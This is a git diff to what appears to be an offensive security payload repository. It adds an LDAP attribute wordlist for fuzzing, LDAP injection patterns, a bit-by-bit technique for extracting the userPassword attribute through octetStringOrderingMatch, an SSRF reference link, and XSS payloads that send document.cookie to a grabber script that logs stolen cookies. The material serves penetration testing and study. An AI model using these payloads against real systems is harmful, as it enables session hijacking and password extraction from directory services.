diff --git a/LDAP injection/Intruders/LDAP_attributes.txt b/LDAP injection/Intruders/LDAP_attributes.txt
new file mode 100644
index 0000000..472a4ec
--- /dev/null
+++ b/LDAP injection/Intruders/LDAP_attributes.txt	
@@ -0,0 +1,9 @@
+userPassword 
+surname 
+name 
+cn 
+sn 
+objectClass 
+mail 
+givenName 
+commonName
\ No newline at end of file
diff --git a/LDAP injection/README.md b/LDAP injection/README.md
index 588ddb0..8e33621 100644
--- a/LDAP injection/README.md	
+++ b/LDAP injection/README.md	
@@ -66,7 +66,37 @@ We can extract using a bypass login
 (&(sn=administrator)(password=MYKE)) : OK
 ```
 
+## Defaults attributes
+
+Can be used in an injection like `*)(ATTRIBUTE_HERE=*`
+
+```bash
+userPassword
+surname
+name
+cn
+sn
+objectClass
+mail
+givenName
+commonName
+```
+
+## Exploiting userPassword attribute
+
+userPassword’ attribute in not a string like the ‘cn’ attribute for example but it’s an OCTET STRING
+In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18).
+
+> octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit.
+
+```bash
+userPassword:2.5.13.18:=\xx (\xx is a byte)
+userPassword:2.5.13.18:=\xx\xx
+userPassword:2.5.13.18:=\xx\xx\xx
+```
+
 ## Thanks to
 
 * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
 * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
+* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
\ No newline at end of file
diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index bbd3b8a..c49084d 100644
--- a/SSRF injection/README.md	
+++ b/SSRF injection/README.md	
@@ -464,3 +464,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
 * [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
 * [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
 * [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
+* [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8)
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 3f94d46..f5c7b15 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -19,7 +19,9 @@ Cookie grabber for XSS
 ```php
 <?php
 // How to use it
-# <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script>
+<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
+or
+<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
 
 // Write the cookie in a file
 $cookie = $_GET['c'];